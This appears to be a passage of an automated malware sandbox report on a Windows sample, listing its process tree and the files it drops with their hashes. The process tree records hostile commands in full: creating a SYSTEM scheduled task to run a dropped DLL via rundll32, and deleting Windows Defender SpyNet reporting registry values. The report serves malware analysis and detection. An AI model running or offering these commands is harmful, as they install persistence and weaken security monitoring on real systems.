C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aaSAiCeWTOJWAqakW" /SC once /ST 00:39:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\eogxozCJrYNgvSKM\CpcGMvta\IxGfcGl.dll\",#1 /mosite_iddyG 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aaSAiCeWTOJWAqakW"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2108
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2768
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1636
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YjdyicABEfUJyYqxF"3⤵PID:2744
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\eogxozCJrYNgvSKM\CpcGMvta\IxGfcGl.dll",#1 /mosite_iddyG 5254032⤵PID:2188
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\eogxozCJrYNgvSKM\CpcGMvta\IxGfcGl.dll",#1 /mosite_iddyG 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:776 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aaSAiCeWTOJWAqakW"4⤵PID:2568
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:640
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1172
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2300
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50b1e947e3b685d918bb9dd860ce955fd
SHA1e01a67b60a0d2b3fdaeb1603dd0c2ecaaca9d4b3
SHA256f7660c95abd341245edc00d2f363edacf64f31eb5a7b46884fca4deff8918d4f
SHA5121b19cedb38dd42c991f530950851919727eaf7e78ff07a3a7f2e1f42a06a62c6f8a98a3a30bbd9d37c1b265913ee17d054b3cb7ca1c174ed327d6ea7e21fc37c
-
Filesize
2KB
MD58b6d41d352fcdeca81f5f7f5d6abb983
SHA1696cc06c8b4925d13eb225b839f2b5c7a777a057
SHA256bdea7d640a310b919bb17b15ad2678067d2e2df90879c9e5a365cfbca5cd5c83
SHA51222bef3354dca9155d190569fbed10f0159a8efeda39926f4dbe606cfb0b07b75a2f2a774c2e054d2ed84ad598b7c76042bd02aab52cc570470fadbe4120976df
-
Filesize
2KB
MD5e8564ae9dc91c18ecc1bce1fe6694a03
SHA1165f0d7b5a56f78b6f1b9c4eb43a388813ab35a8
SHA25615e490e782dda136182178e8d7f26ee27b135f9ba8f554736c48df63ac76b30a
SHA512441baf55f21bd704f0276c0ef582d12e29a10a30e7470970e1b8d84041684e2b0c9bb751a89958a3862a531bdea68b2da0389757be024d5b4fe4114129c1d677
-
Filesize
2KB
MD5269e4d4306035ce2cf80da0050e37d3c
SHA12f017eea50a0acf6d0e59d83f6c260b2ca9b7b30
SHA256cea8452cfa037607e97f8fe38f233a3b67134f386a6e04f8db132adfb0ae2bd3
SHA512f351a43a1d9521910ec1035c47509fd7066ce4be3db0d894c1731fe59820c39d2f21bb488529a812f5d7894037514dec7912a65b2a5ec1519de4eb1d46cb02eb
-
Filesize
1.8MB
MD5b6ad0f1d0ffc224379abeae9498aa657
SHA114eae7aa9bb2e5c2fbf6668cc4d6d06a2a426302
SHA256ebb97a195b7583a603220c31bb0c10ba7fdcb7a198369a4a6bae0726bfde776e
SHA512cd997475da4cad5dba9dc8798ff9690f7d55541c27348844337579f51e5ee6dc94b1d0a75dcc4e7544ae17975c67f2864701322133c3e5a962f4ed22e10365a5
-
Filesize
2KB
MD58a8eaddb5262a6ab2fb7c8ca1b8c9c74
SHA1bc5674f57849311a3e849ebcb6c219d28b0b1d49
SHA256f656d4a0bed614eb8cabeb83f2218829bc6f535384d4cace7f04519a8e5f8a68
SHA51287342eb86938e98111e3567c9e254b847cea9c0475787a567b5c2caca8b5c3345a3e4b2650fb37f160cebb28c21bd203384c779a1c778b81e984490d6cf38ac2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD54fda460c8f4fe9737202f13de58de193
SHA19a098844c6e2773d183e60203bde03e38041e7a0
SHA256aa717fc77bd2e7547963ce3dfa0de8918a78f605358607257b23db16237e0379
SHA5128681d09529e0cfd9cb04fb340ca9fbe7c7bc1de93809521450cf39fa10243b86e6ced0eddc439229bd9d9c58375f47107e74fdcaadec809adca9fb17bad84eda
-
Filesize
28KB
MD50d90a30b9e870607e9fae82712f88924
SHA1f61837b0d04be5b7277647d5802c54072202be54
SHA2569db629f1852dc92de5897d087373e79e9749b5fd6f338396df5426ae70bea324
SHA5126cb681d695f7bc68b2012c5114de412fb0c97da4987e7f929a7d27529c058bacc687289befdc031a33b3727f4e260711b30ef22a6db474bf034db0d1893b71eb
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52f80748df6717aea58ed98cf18022318
SHA1cb44a340aabfc6084ad5857fa44182ef168d587f
SHA25682bb892cc8a5f5b23e03313a23f26030d5b20fe9d16683ae877bbda98cae8878
SHA5120b547d4e599c276d4cfe67b60d6b0161f480956e6fcf7232d8c9fb3762fafc1e73b82366635de5d30dd24bd2eb94ea8da55ee4d69361f019bc35e99bd73a1c86
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5784af97239512eafd1e9706bcd7ea72d
SHA19544a26fc2eed75000614ea60937effe47ca35ab
SHA256d584852505a86005e8ec69e3c78bafdf0799dc4c37e42ce4069524266d385422
SHA51212e423687f0bee956012e0f37d30a2712c6bd839d5200107c0b225f40a6870d8883c245d93ae998abde8b1f93bcb99670652565b30bd0f1b607b5972032b6280
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59cffa488c9d111e133da9ff82479361c
SHA12cb280db4eb4723dda863ab66006b812fedde2ad
SHA25623e3d61bb0863c2a9c17f488fe44e50978d2bd2d33fb5524966763e229cb76a3
SHA51260946094db8e995437026ecfb80aae697995a2a69a9a7bda9cee2303a7cb710f1cb580a224ff24d6d0943bb9cb4a9dc61ba864b55e43bdd79ab33cda469b5a10
-
Filesize
7KB
MD5fc69c2018cc0f8fe76ddc3ff0c3e6f52
SHA16506bcf82171a09e7b15cf46ddffdaee7f75262c
SHA2562bca5b2216d435d6b72ca19ff61fdaf991aa6237ca76ca9fcab2564d9bbb6cb3
SHA512d8596db1034bcc0873ac55213136a2ebec114c8bca3d4b11d251824bea5beaa224c24c9a76e21c3d7ccc589f5670d0d322d5b7ba1f133bff3350cfcdf09abf04
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211
-
Filesize
9KB
MD55e2809416ca9857496e4cfb956f4e2cd
SHA175cf9af6e1d43f76f0decfe877d2567e4d69d291
SHA256a06f79bd4358240a1a8465f368ca9f61b2756427a1bce92c46d0ee0612c30e17
SHA51284d5a26cb2e8af869c4cc137d9ba781baf0d4be158e1c1928a31729ed933128d94bcbc24e828b8356bdeed78a433d7dfe7d05f692452753f1c90a6dd37cb7091
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
5KB
MD5ef0076885414e191045134bde2d1cb8e
SHA1d041887224bb21b67f21e3e57118fe65f6e39a5c
SHA256bfa46dd3cce03da6f0e422ca9efcd64c8fe6f64b28924321ca442bee07332141
SHA512de3a2a72509aeb798e321b0277f2bba303077e71e2503bfbe5d978004f6ae7c55460bfe40479477035ba9008314bb8cfc319fa8ed39723efc71397289b1d2e02
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211